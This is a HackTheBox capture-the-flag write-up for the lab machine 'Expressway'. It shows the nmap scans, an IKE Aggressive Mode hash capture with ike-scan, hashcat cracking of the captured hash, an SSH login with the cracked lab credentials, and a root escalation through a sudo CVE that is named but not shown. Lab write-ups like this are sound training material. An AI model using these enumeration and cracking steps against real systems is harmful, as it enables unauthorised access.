Welcome! #
- HackTheBox is an offensive cybersecurity focused platform.
- This is a writeup for a Easy Linux machine named Expressway.
- We take advantage of IKE Aggressive Mode to get a hash, crack the hash for credentials, ssh onto the box, and abuse a sudo CVE to get root.
nmap #
Let’s start with enumerating the TCP ports on the endpoint.
nmap -sCV -p- 10.129.238.52
'-sCV' - (s)can types: s(C)ripts and (V)ersions.
'-p-' - All ports
Results:
Nmap scan report for 10.129.238.52
Host is up (0.0090s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThat SSH version is fairly up to date. I don’t expect this to be the entry point they want from us. Let’s enumerate the endpoint’s UDP ports.
nmap -sCVU 10.129.238.52
'-sCVU' - (s)can types: s(C)ripts and (V)ersions on a (U)DP scan.
Nmap scan report for 10.129.238.52
Host is up (0.0090s latency).
Not shown: 996 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
| fingerprint-strings:
| IKE_MAIN_MODE:
|_ "3DUfw
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=2/27%Time=69A25C3B%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw\xdf\xca\xfa-G\xbc\xa4\xd5\x01\x10\x02\0
SF:\0\0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\
SF:0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x
SF:01\x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0
SF:\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,
SF:9C,"1'\xfc\xb08\x10\x9e\x89\xa8ULb\x9f\x05\xe1\xf8\x01\x10\x02\0\0\0\0\
SF:0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x2
SF:0\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\x
SF:80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\x
SF:14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\xd
SF:5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\x
SF:80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1270.09 seconds68, 69, and 4500 are filtered, so it looks like isakmp on UDP port 500 is what I’m going to poke at first.
Looking at hacktricks.
ike-scan #
sudo ike-scan -M -A 10.129.238.52
'-M' - Multiline output (To make it easier to read)
'-A' - IKE Aggressive Mode
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.238.52 Aggressive Mode Handshake returned
HDR=(CKY-R=31780678f7f2c97c)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, [email protected])
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.020 seconds (49.22 hosts/sec). 1 returned handshake; 0 returned notifyThat ID is interesting. Let’s see if we can get a hash.
sudo ike-scan -M -A -n ike --pskcrack=hash.txt 10.129.238.52
'-M' - Multiline output (To make it easier to read)
'-A' - IKE Aggressive Mode
'-n ike' - Use 'ike' as the ID.
'--pskcrack=hash.txt' - Output a PSK hash for us to crack.
Worked. :)
hashcat #
hashcat -a 0 -m 5400 ./hash.txt /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt
'-a 0' - Attack mode: Dictionary Attack
'-m 5400' - Hash type: IKE-PSK SHA1
'./hash.txt' - The saved hash from ike-scan.
'rockyou.txt' - Dictionary file of choice.
Cracked it for the credentials: ike:freakingrockstarontheroad
user - SSH #
Was able to use the cracked credentials (ike:freakingrockstarontheroad) to SSH into the box.
Got user flag. :)
I first looked for the tftp directory that we found in the scan, only to find a cisco configuration file. Wasn’t very helpful.
LinPEAS #
Ran linpeas and found that sudo was out of date and vulnerable.
root - CVE-2025-32463 #
Got root. :)
